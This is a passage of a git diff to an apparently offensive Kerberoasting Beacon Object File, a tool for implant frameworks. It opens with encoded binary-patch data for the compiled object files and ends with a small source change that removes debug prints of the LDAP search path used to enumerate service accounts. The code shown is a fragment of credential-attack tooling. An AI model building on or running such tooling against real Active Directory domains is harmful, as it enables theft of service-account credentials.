ztbvywM(ZUIeTaN0?o**K?WG`L8THaj1WD2;q=&+U+qw7BE$DZDoZshu&pE$y?*09q zOuo%pQnwpG88*@4>X~f;@DYF-t7@=`OB=*5`BO!Tz+-Jh?)EVz2FR<+#bS8sEw&w{~zyU zH&>ijG_Dk>o)TV1OQvNrz%wwQB&=~olhT4*-QELgV)}jS=#;BM!G|gNRmH*-!<7zv zK>cYWzWvSUrlU;I@Y781GfXRM`Op7SiN>l}GD_btA$r)wkp#`S2FQxE=sHgbPxo4S z$W7Yi4v@Pv;qG!i#%=y>t5D(XSiNGQ58THO<#uIRh}7~kHJGv%BQ;^|^TL)a&vE(M z?8WDEIOs3;M)M;E;2aiL)@eM06f)iM?3ccI%I4-M3_}>=FbKW)cp(E>pf5U(Q6rnO zhljJViS&5v^0o8`-!_`Onn|bpR-k3}4E@O7k}{p1hMeF4Xu>^>a1Y6=(mP%Is?#o# zQ}s6Ca#W=dl9n6SDS?C&_Z!!>8KibqD4=)~P}d|~d#`Jskb1Sidi=9mvJFYo+`86@q%}AseGiD_pmG=l hufGBOeEJ5DwUmK(7V3y{NSk!2?+O`|8bgcqzX8Gkv=9IQ delta 1051 zcmZXSUr19?9LIl0U2e-V$Z)%xYY)w7{%cpGGN^S4G&BnCayLz1w9UZuGG?mc!$y!Ud>=YD^`@9%f+Irn4q zNuMEfsTkBNpEOwNvQ~gv0x(vsX)uSA9RkPdL%~>(N!qv$$KT2Jwt^B{@=m30z^1-t zHtHsf0H2e;oCR`qN+6Tv9ONCHH$_%=O7W@QB6P;~)5B(QpET~t?oFhn@ePml z058-s(Cy8^*j#2-8zw!50`4mpbFSWKIisAwPM^E zb}df{Ux=LxMwg1VxT9^o;hwhRr@~z^`-xz;91hhRsp9lfU)3;y)Y~dY@ldx3pcJbW zK_8M?qe-qkMRI7`8?I$}-dap&-bzj)606dR(-zGu^XO$xSCQ};!p8Tw_zbC1v*eIm z8hz!_A4vG1V>fOrYwSg0+5(cOMLR42jT*^FO&X1Gy2aQ|KKZqyE#gwb@ G?yA2-9p;Px diff --git a/BOF/Kerberoast/Kerberoast.x86.o b/BOF/Kerberoast/Kerberoast.x86.o index 0cfdd92aa53f735280ea7a4981145d210b5eb2d7..9b944bf78c1381bc34f6d4277c57b084d369ef52 100644 GIT binary patch delta 719 zcmZXQO=uHA6oB6(yJ<*MX*J1iHYudKX^NWNZ9Qp=7?U8aE!E;xG_es3sS1stkWeH@ z4Z%bDD0oakJcx+0XGO#ie-5@idJ#NG0wS%59z^2HF3!cBW%irzy_xrB&1)Z)JhRLN zy=OSFHt(Kq;P{oa2?e1nLjKi|d-r$@phkyJZeo0xq(`39YAIDE}l8xbk zpzcV1GtUM6jGe%|a*)m7x}vcxzE)zagkKez-9<5!^rwG!yVZ2NQf|Yo{#v?S71Z_v z^L(i0_RT^H5^x5Nflea|1y}|gQ}0WO)bjlG+|~JPK6j}YxtzID$SrCfz+H9PoQgKs zNZ3g|CHA=QI8F|Tr&gWLA!oDY6@)P92>p*a^UtWiuRj|A=v~wWH*s9sx6xfa?7S)N7Kl`9N0CUk=mn3yBchjTPRam=Me9W404pRP5l&e06{nA! zzH<_T|C$*j+HdVJxSQne0(W`tR=Hc_u0gcdzTIO&yTj)}Ea^LJ8kdZa*d@J<_lzWS Jm|MnY*I)OJiV^?- delta 971 zcmZXTPiWIn9LIleO}iR9L1>$pRf$`+!o*|~ybKlVQq;9vFydhcQBY+5Ik>|PJ2((Utl%y(Jt#7NN%YZS5?(%hzrXkWy(BMh z(`JT`6AxI&l2+oS-Mtb3M*#d`TZCo2$2h1^M8UsXkOSwp3pf#^uKfbnu-ql z=!&3`HCiKzA$gO%fJ*y4mRj9(8W9hO8pxRTaAMb5$J+e(C}=46lAe$MP+|R);pYPdaHi2Wuuk6oV#db|As~MZ0A6- zzw`9@WM57`W1LGR6Dm(*%29JdxlMKsxiC7i#hb4>RO3E;!{xf*da>Z+xDd)RevSv` ziN-+nNKX*JdQl$eMG|bf%Ct$OdRx2Cw0Tzdm1%CA=%j2#a#9-crrL9lFxOy|M#5_Z z8xJvY0?FDp9(aVL+4PdROGtR3yF>ift_jJ}rjVL#_d8OHP5d^1JvP-bYGu@oG~(Dv zL}&d2NOksaCZaVOTPVcEJWR{L;weC~s PFVk7AjkKGq+6T`c*zCuW diff --git a/BOF/Kerberoast/SOURCE/Kerberoast.c b/BOF/Kerberoast/SOURCE/Kerberoast.c index c1351af..9f7c067 100755 --- a/BOF/Kerberoast/SOURCE/Kerberoast.c +++ b/BOF/Kerberoast/SOURCE/Kerberoast.c @@ -540,10 +540,8 @@ HRESULT SearchDirectory(_In_ BOOL bListSPNs, _In_ BOOL bExcludeAES, _In_ LPCWSTR // Construct the LDAP path if (lpwDC != NULL && lpwDN != NULL) { // Use DC and DN if provided MSVCRT$swprintf_s(wcPathName, BUF_SIZE, L"LDAP://%ls/%ls", lpwDC, lpwDN); - BeaconPrintf(CALLBACK_OUTPUT, "wcPathName 1: %ls\n", wcPathName); - } else if (lpwDC != NULL && lpwDN == NULL) { + } else if (lpwDC != NULL && lpwDN == NULL) { // Use only DC if DN is not provided MSVCRT$swprintf_s(wcPathName, BUF_SIZE, L"LDAP://%ls", lpwDC); - BeaconPrintf(CALLBACK_OUTPUT, "wcPathName no DN: %ls\n", wcPathName); } else { // Get rootDSE and the current user's domain container DN. hr = ADsOpenObject(L"LDAP://rootDSE", @@ -566,7 +564,6 @@ HRESULT SearchDirectory(_In_ BOOL bListSPNs, _In_ BOOL bExcludeAES, _In_ LPCWSTR MSVCRT$wcscpy_s(wcPathName, _countof(wcPathName), L"LDAP://"); MSVCRT$wcscat_s(wcPathName, _countof(wcPathName), var.bstrVal); - BeaconPrintf(CALLBACK_OUTPUT, "wcPathName no extras: %ls\n", wcPathName); } hr = ADsOpenObject((LPCWSTR)wcPathName,